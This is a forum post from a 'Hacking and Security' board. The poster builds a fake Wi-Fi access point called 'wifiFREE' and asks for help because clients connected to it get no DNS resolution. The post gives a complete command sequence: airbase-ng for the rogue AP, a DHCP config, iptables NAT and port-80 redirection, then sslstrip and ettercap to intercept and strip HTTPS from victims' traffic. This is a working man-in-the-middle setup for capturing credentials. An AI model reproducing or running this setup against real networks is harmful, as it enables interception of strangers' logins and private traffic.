Hacking and Security / FAKE AP - trouble with dns
« on: November 22, 2014, 11:05:39 am »
Hi everybody.
I'm writing because I can't find any solution for my problem.
I'm testing a FAKE AP on my network, but I'm having trouble with DNS.
My configuration is:
wlan0 is the wireless network linked to my LAN network
wlan1 is my ALFA Network that I want to use as the fake AP
My ifconfig is:
eth0      Link encap:Ethernet HWaddr 00:1c:25:95:70:18
          UP BROADCAST MULTICAST MTU:1500 Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
          Interrupt:20 Memory:fc600000-fc620000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1 Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING MTU:65536 Metric:1
          RX packets:228504 errors:0 dropped:0 overruns:0 frame:0
          TX packets:228504 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:34120287 (32.5 MiB) TX bytes:34120287 (32.5 MiB)

wlan0     Link encap:Ethernet HWaddr 00:16:ea:b1:5d:12
          inet addr:172.16.1.157 Bcast:172.16.255.255 Mask:255.255.0.0
          inet6 addr: fe80::216:eaff:feb1:5d12/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:208708 errors:0 dropped:0 overruns:0 frame:0
          TX packets:125550 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:159616952 (152.2 MiB) TX bytes:17668703 (16.8 MiB)

wlan1     Link encap:Ethernet HWaddr 00:c0:ca:62:04:a9
          UP BROADCAST MULTICAST MTU:1500 Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

And my route -n is:
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         172.16.1.254    0.0.0.0         UG    0      0        0 wlan0
172.16.0.0      0.0.0.0         255.255.0.0     U     0      0        0 wlan0

I've submitted these commands:
apt-get install dhcp3-server
gedit /etc/dhcpd.conf

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 172.16.77.0 netmask 255.255.255.0 {
    option routers 172.16.77.254;
    option subnet-mask 255.255.255.0;
    option domain-name "wifiFREE";
    option domain-name-servers 172.16.77.254;
    range 172.16.77.2 172.16.77.20;
}

airmon-ng
airmon-ng start wlan1
airbase-ng -c 11 -e wifiFREE mon0
ifconfig at0 172.16.77.254 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 172.16.77.0 netmask 255.255.255.0 gw 172.16.77.254
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 172.16.1.254
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
sslstrip -l 8080
ettercap -p -u -T -q -i at0
My iPad connected very well to the fake network wifiFREE, but when I open Safari I cannot view any webpage. If I ping 8.8.8.8 with Fing I get a response, and if I navigate to an IP address in Safari I can see webpages.
I've also tried with:
option domain-name-servers 8.8.8.8, 172.16.77.254;
but even so I cannot see web pages.
I'm going crazy and I cannot find any solution.
Please help me! TIA